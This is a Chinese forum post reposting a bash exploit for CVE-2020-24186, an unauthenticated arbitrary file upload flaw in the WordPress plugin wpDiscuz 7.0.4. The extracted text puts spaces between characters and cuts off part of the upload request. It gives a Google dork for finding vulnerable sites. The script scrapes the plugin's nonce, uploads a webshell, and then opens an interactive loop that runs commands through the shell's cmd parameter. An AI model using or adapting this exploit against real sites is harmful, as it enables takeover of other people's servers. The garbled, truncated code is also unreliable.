搜索

[20620] 2021-06-09_WordPress插件wpDiscuz7.0.4–任意文件上传漏洞EXP

文档创建者:s7ckTeam
浏览次数:9
最后更新:2025-01-18
2021-06-09_WordPress插件wpDiscuz7.0.4–任意文件上传漏洞EXP W o r d P r e s s     w p D i s c u z   7 . 0 . 4       E X P K h a n   2 0 2 1 - 0 6 - 0 9 #   E x p l o i t   T i t l e :   W o r d P r e s s   P l u g i n   w p D i s c u z   7 . 0 . 4   -   A r b i t r a r y   F i l e   U p l o a d   ( U n a u t h e n t i c a t e d ) #   G o o g l e   D o r k :   i n u r l : / w p - c o n t e n t / p l u g i n s / w p d i s c u z / #   D a t e :   2 0 2 1 - 0 6 - 0 6 #   O r i g i n a l   A u t h o r :   C h l o e   C h a m b e r l a n d   #   E x p l o i t   A u t h o r :   J u a m p a   R o d r í g u e z   a k a   U n D 3 s c 0 n 0 c 1 d 0 #   V e n d o r   H o m e p a g e :   h t t p s : / / g v e c t o r s . c o m / #   S o f t w a r e   L i n k :   h t t p s : / / d o w n l o a d s . w o r d p r e s s . o r g / p l u g i n / w p d i s c u z . 7 . 0 . 4 . z i p #   V e r s i o n :   7 . 0 . 4 #   T e s t e d   o n :   U b u n t u   /   W o r d P r e s s   5 . 6 . 2 #   C V E   :   C V E - 2 0 2 0 - 2 4 1 8 6 # ! / b i n / b a s h i f   [   - z   $ 1   ] t h e n     e c h o   - e   " n [ i ]   U s a g e :   e x p l o i t . s h   [ I P ]   [ / i n d e x . p h p / 2 0 2 1 / 0 6 / 0 6 / p o s t ] n "     e x i t   0 e l i f   [   - z   $ 2   ] t h e n     e c h o   - e   " n [ i ]   U s a g e :   e x p l o i t . s h   [ I P ]   [ / i n d e x . p h p / 2 0 2 1 / 0 6 / 0 6 / p o s t ] n "     e x i t   0 e l s e p o s t = $ ( c u r l   - s I   h t t p : / / $ 1 $ 2 /   |   h e a d   - n 1 ) i f   [ [   " $ p o s t "   = =   * " 2 0 0   O K " *   ] ] ;   t h e n         w m u _ n o n c e = $ ( c u r l   - s   h t t p : / / $ 1 $ 2 /   |   s e d   - r   " s / w m u S e c u r i t y / n w m u S e c u r i t y / g "   |   g r e p   w m u S e c u r i t y   |   c u t   - d   ' " '   - f 3 )         w e b s h e l l = $ ( c u r l   - i s k   - X   ' P O S T '   - H   ' X - R e q u e s t e d - W i t h :   X M L H t t p R e q u e s t '   - H   ' C o n t e n t - T y p e :   m u l t i p a r t / f o r m - d a t a ;   b o u n d a r y = - - - - - - - - - - - - - - - - - - - - - - - - - - - W e b K i t F o r m B o u n d a r y U n D 3 s '   - - d a t a - b i n a r y   $         e c h o   - e   " n W e b s h e l l : "   $ w e b s h e l l " n "         e c h o   - e   " - - - - - - - - - - - - - - W I N - - - - - - - - - - - - - - "         e c h o   - e   "                 ¡ G o t     w e b s h e l l !                 "         e c h o   - e   " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - n "         w h i l e   :         d o     r e a d   - p   ' $   '   c o m m a n d     c u r l   - s   $ w e b s h e l l ? c m d = $ c o m m a n d   |   g r e p   - v   G I F 8 d o n e e l s e         e c h o   - e   " n [ ! ]   T h e   i n d i c a t e d   p o s t   w a s   n o t   f o u n d n " f i f i
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理